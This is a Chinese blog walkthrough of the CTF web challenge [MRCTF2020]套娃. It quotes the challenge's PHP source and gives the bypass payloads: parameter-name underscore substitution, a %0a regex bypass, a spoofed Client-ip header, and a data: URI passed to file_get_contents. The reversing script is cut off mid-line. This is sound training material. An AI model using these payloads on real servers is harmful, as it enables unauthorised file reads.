BUUCTF--[MRCTF2020]套娃

最新推荐文章于 2024-02-18 15:01:53 发布
最新推荐文章于 2024-02-18 15:01:53 发布
阅读量203 收藏
点赞数
文章标签: php 服务器 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/text202202/article/details/129805401
版权

打开靶机:

1624366948_60d1df640965096e14444.png!small

查看源码发现 代码:

$query = $_SERVER['QUERY_STRING'];

 if( substr_count($query, '_') !== 0 || substr_count($query, '%5f') != 0 ){
    die('Y0u are So cutE!');
}
 if($_GET['b_u_p_t'] !== '23333' && preg_match('/^23333$/', $_GET['b_u_p_t'])){
    echo "you are going to the next ~";
}

解析:

第一个if判断传参的字符串,不能有_和%5f
绕过:PHP会将传参中的空格( )、小数点(.)自动替换成下划线
第二个if判断get传参b_u_p_t不等于23333 并且开头和结尾和中间必须是23333
绕过:在23333结尾加个换行符url编码为%0a 即可绕过,

paylaod:

 **1) ?b.u.p.t=23333%0a  
 2) ?b u p t=23333%0a**

1624412864_60d292c039f529dec7496.png!small

发现 secrettw.php

进入得

1624413034_60d2936a7b5724d81a34a.png!small

hackbar修改HTTP头无用

查看原码发现 一段jsfuck编码:

1624413926_60d296e68ca92fdd18e46.png!small

解码得

 **post me Merak  
**

随便用POST方法给Merak一个值

1624413926_60d296e689fee5fc41be1.png!small

发现代码

Flag is here~But how to get it?   
<?php 
error_reporting(0); 
include 'takeip.php';
ini_set('open_basedir','.'); 
include 'flag.php';

if(isset($_POST['Merak'])){ 
    highlight_file(__FILE__); 
    die(); 
} 

function change($v){ 
    $v = base64_decode($v); 
    $re = ''; 
    for($i=0;$i<strlen($v);$i++){ 
        $re .= chr ( ord ($v[$i]) + $i*2 ); 
    } 
    return $re; 
}
echo 'Local access only!'."<br/>";
$ip = getIp();
if($ip!='127.0.0.1')
echo "Sorry,you don't have permission!  Your ip is :".$ip;
if($ip === '127.0.0.1' && file_get_contents($_GET['2333']) === 'todat is a happy day' ){
echo "Your REQUEST is:".change($_GET['file']);
echo file_get_contents(change($_GET['file'])); }
?>

代码解析

1、来源ip是127.0.0.1 用 Client-ip

2、get参数2333传来的值,使用文件流打开后内容为todat is a happy day
3、file_get_contents用php伪协议绕过

4.反写change加密函数

反写 exp:

<?php function unchange($v){ $re = ''; for($i=0;$i

1624415080_60d29b68d3c443859a174.png!small

最后 payload:

**?2333=data:text/plain,todat is a happy day &file=ZmpdYSZmXGI= **

Client-ip : 127.0.0.1

1624415212_60d29bec289f13bc381f5.png!small

查看源码 得 FALG

1624415292_60d29c3c48383c1381712.png!small

网络安全工程师企业级学习路线

这时候你当然需要一份系统性的学习路线

如图片过大被平台压缩导致看不清的话,可以在文末下载(无偿的),大家也可以一起学习交流一下。

一些我收集的网络安全自学入门书籍

一些我白嫖到的不错的视频教程:

上述资料【扫下方二维码】就可以领取了,无偿分享

AIGC小工二狗
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
ctf (套娃)
Glacier_Mount的博客
07-21 4887
键盘流量
BUUCTF [MRCTF2020]套娃
qq_43774856的博客
11-30 222
BUUCTF [MRCTF2020]套娃 打开链接,查看源码,如图所示 关于$_SERVER[‘QUERY_STRING’]取值, 例如: http://localhost/aaa/?p=222 $_SERVER[‘QUERY_STRING’] = “p=222”; substr_count()函数计算子串在字符串中出现的次数 PS:子串区分大小写 上述代码不能出现’_’和’%5f’,可以用‘ ’或‘.’或‘ %5F’绕过 通过get取得的参数b_u_p_t不等于23333但是正则,匹配需要匹配到2333
2020新春战疫ctf公益赛——Misc套娃
weixin_43491669的博客
03-03 3565
一看套娃就能猜到会是一个繁琐的题目,从压缩包里放着压缩包可以猜测整个题目的过程中寻找压缩包密码是一条主线。 **第一层** 很明显的txt里边Ook的加密,解密便得到压缩包2的密码。 brainfuck/Ook解密 但是还给了一张图片,按着处理图片的步骤看属性,winhex打开。。。略,个人比较喜欢一个叫Hxd的工具,跟winhex功能是差不多的,打开图片后发现最末尾出现了part1一串字符,...
CTFSHOW 套娃shell
羽的博客
04-29 2255
CTFSHOW 套娃shell 1、题目给的是用nc连接的,测试了下,传个请求包过去就可以了,比如(最后的换行不要忘了): GET /?file=/a HTTP/1.1 Host: 127.0.0.1 Connection: close 但是又不是完全是按照这个请求包来的,把host改成其他的,也是可以成功。说明不是完全按照请求头的规则来读取的。 题目里面的正则表达式大概意思就是以/开头,并且后面只能有数字字母和/。 我们需要在服务器上构造一个文件,并且文件内容是可控的,或者是服务器本身就有这样的文件也
ctf MISC 简单套娃
god_001的博客
03-27 1126
题目给了一个图片 用010editor分析,发现两个 FF D8(JPG图像起始位置),复制第二段开始的数据另存为JPG图像 将得到的两个图象使用Stegsolve里的"Image Combiner"模式(图片拼接),在SUB(R,G,B)模式下得到flag 对于Stegsolve的使用: 其有 File Format、Data Extract、Steregram Solve、Frame Browser、Image Combiner五种功能 File Format文件格式功能下,可查看图片的
合天网安 CTF之第六周-套娃一样的上传
未来社会二十年发展的核心技术趋势由ABCD四个字母组成,分别是AI(人工智能)、BlockChain(区块链)、Cloud(云)、和Data(大数据)每一次进步都有新的认知和感触
11-10 393
本实验无writeup,需要同学们发挥自己所学,一步一步寻找线索,寻找细节信息,最终拿下目标flag。
众星捧月-俄罗斯套娃游戏开发
06-19
将Cross.txt文本中的的所代表的套娃重量的矩阵数据读入到Boy类的的成员weight二维数组中。 第二步:定义了向上走、向下走、向左走、向右走四个方向函数:Up()、Down()、Left()、Right(),每个函数都有一个...
Python-Python隐写工具用来在图像中隐藏图像或文本
08-10
至于压缩包中的文件“Matroschka-master”,这个名字可能是指一个开源项目或库,它与俄罗斯套娃(Matryoshka dolls)的层层嵌概念相呼应,可能意味着该工具能够在图像中嵌多层隐藏信息。在Python中,这样的实现...
医学-套娃状锰氧化合物纳米晶复合粒子及其制备方法.zip
11-12
标题中的“医学-套娃状锰氧化合物纳米晶复合粒子及其制备方法”揭示了这个文件内容的核心,它涉及到的是一个与医学相关的科研成果,具体是关于一种特殊的锰氧化合物纳米晶复合粒子的结构设计和制造工艺。在医学领域...
leetcode信封-leetcode:leetcode
06-30
354.俄罗斯套娃信封问题 2021-01-26: 144.二叉树的前序遍历 94.二叉树的中序遍历 145.二叉树的后序遍历 102.二叉树的层序遍历 104.二叉树的最大深度 112.路径总和 101.对称二叉树 1128.等价多米诺骨牌对的数量 面试...
matryoshka-develop.rar
10-09
这个项目的名称“matryoshka”来源于俄罗斯套娃,这可能意味着项目具有分层或者嵌的结构,或者是对代码模块化的一种比喻。 描述中的“matryoshka-develop.rar”进一步确认了这是一个开发版本的压缩文件,通常包含...
[MRCTF2020]套娃 GET POST 读取字符串特性 伪造ip 伪协议伪造 file_get_contents()
m0_64180167的博客
09-26 656
然后我们需要绕过 第一个判断个数 又要过第二个正则 正则使用 %0A 即可。选择就是如何绕过 change 输出flag 就要开始逆向了。我们通过 GET POST 传递参数是将字符串作为数组传递。这里面就显示了 我们 在每个位置可以 选择绕过的 字符。其次就是通过 fie_get_content读取。我们要如何实现绕过呢, 下面这些方法都可以实现。运用这里我们就可以绕过许多的waf 或者拦截。第一个我们如何绕过呢 使用上面的表来桡过。这里能发现 就是进行了两个操作。那么传递了参数 做了什么操作。
[MRCTF2020]套娃
Yb_140的博客
11-02 737
php字符串解析特性+绕过正则+JsFuck解密
[MRCTF2020]套娃 ctf web buuctf
wuyaowangchuan的博客
11-11 1104
打开之后 源代码 $query = $_SERVER['QUERY_STRING'];// if( substr_count($query, '_') !== 0 || substr_count($query, '%5f') != 0 ){ die('Y0u are So cutE!'); } if($_GET['b_u_p_t'] !== '23333' && preg_match('/^23333$/', $_GET['b_u_p_t'])){ echo "y.
练[MRCTF2020]套娃
m0_66225311的博客
10-07 420
参数的`_`符号的替换,正则和强等于联合绕过,`jsfuck`编码,`bp`请求方式的转变,本地`ip`的请求头,代码审计,简单的字符串解密和加密函数之间的逆推构造,`file_get_contents`函数的绕过
BUUCTF NewStarCTF 公开赛赛道Week3 Writeup
末初的CSDN博客
10-09 5539
BUUCTF NewStarCTF 公开赛赛道Week3 Writeup
[MRCTF2020]套娃1
最新发布
不会编程的崽的博客
02-18 1189
php非法传参,data伪协议,[][(![]+[])的js代码,数据包ip的伪造
ctfshow套娃shell
08-24
CTFSHOW套娃shell是一种常见的利用技术,用于在Web应用程序中执行命令和控制服务器。根据提供的引用内容,以下是一种使用CTFSHOW套娃shell的方法: 1. 首先,需要获取CTFSHOW扩展。可以通过运行命令`...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值